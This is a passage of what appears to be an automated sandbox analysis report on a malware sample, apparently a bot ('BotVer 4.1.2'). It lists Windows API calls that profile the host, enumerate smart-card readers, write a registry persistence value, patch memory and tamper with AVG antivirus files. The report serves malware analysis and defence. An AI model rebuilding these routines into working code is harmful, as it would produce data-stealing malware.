                                                                                                                                                                                                            • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                            • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$6988922Ca
                                                                                                                                                                                                            • API String ID: 2823094833-234750097
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02BCA7CB
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02BCA818
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02BCA847
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000), ref: 02BCA84E
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02BCA862
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 02BCA879
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCA881
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 842647815-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02BC6A83,00000000), ref: 02BD5875
                                                                                                                                                                                                            • SCardListReadersA.WINSCARD(02BC6A83,00000000,?,FFFFFFFF), ref: 02BD588C
                                                                                                                                                                                                            • SCardConnectA.WINSCARD(02BC6A83,?,00000002,00000003,?,?), ref: 02BD58BE
                                                                                                                                                                                                            • SCardDisconnect.WINSCARD(?,00000000), ref: 02BD58E9
                                                                                                                                                                                                            • SCardFreeMemory.WINSCARD(02BC6A83,?), ref: 02BD5905
                                                                                                                                                                                                            • SCardReleaseContext.WINSCARD(02BC6A83), ref: 02BD5913
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3231658416-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02BC4FE7
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02BC5045
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2160739018-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB6AB4
                                                                                                                                                                                                              • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                              • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                              • Part of subcall function 02BB6980: lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                              • Part of subcall function 02BB6980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                              • Part of subcall function 02BB6980: RegSetValueExA.ADVAPI32(?,698896B4a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                              • Part of subcall function 02BB6980: RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AE4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB6AE7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AF4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB6AF7
                                                                                                                                                                                                              • Part of subcall function 02BB6690: memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1728208919-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3228293703-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC6CA0,00000000,00000000,00000000), ref: 02BC77D4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC77EC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC77FD
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02BC7805
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4233414108-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,76F90F10,00000000,02BCA2D3), ref: 02BC4A88
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC4A8B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC4A98
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC4A9B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 789118668-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1494777729-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: v-@
                                                                                                                                                                                                            • API String ID: 3664257935-4190885519
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,02C0D3A4,75775CE0), ref: 02BB4C37
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02BB4C5E
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB4C6F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02BB3F9D,00000000), ref: 02BB4C7F
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02BB4C90
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CA4
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02BB4CB1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02BB4CC1
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02BB4CD2
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CE6
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4CF3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4D03
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02BB4D14
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB4D28
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D3C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02BB4D49
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02BB4D59
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02BB4D6A
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D9C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4DAB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4DBF
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4DD2
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4DE6
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4DF3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4E03
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4E14
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 02BB4E25
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E39
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E46
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02BB4E56
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E67
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E92
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EA1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4EB5
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EC8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4EDC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4EE9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4EF9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4F0A
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02BB4F21
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F35
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F42
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02BB4F52
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F63
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F8E
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4F9D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4FB1
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4FC4
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4FD8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4FE5
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4FF5
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5006
                                                                                                                                                                                                            • GetSystemDefaultLangID.KERNEL32 ref: 02BB500C
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB5026
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5093
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50A0
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02BB50B0
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50C1
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB50EC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB50FB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB510F
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5122
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5136
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5143
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5153
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5164
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02BB516E
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 02BB5175
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 02BB517E
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 02BB5187
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB519F
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB51B6
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51C3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02BB51D3
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51E4
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB520F
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB521E
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5232
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5245
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5259
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5266
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5276
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5287
                                                                                                                                                                                                            • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02BB52A7
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB52BB
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52C8
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02BB52D8
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52E9
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5314
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5323
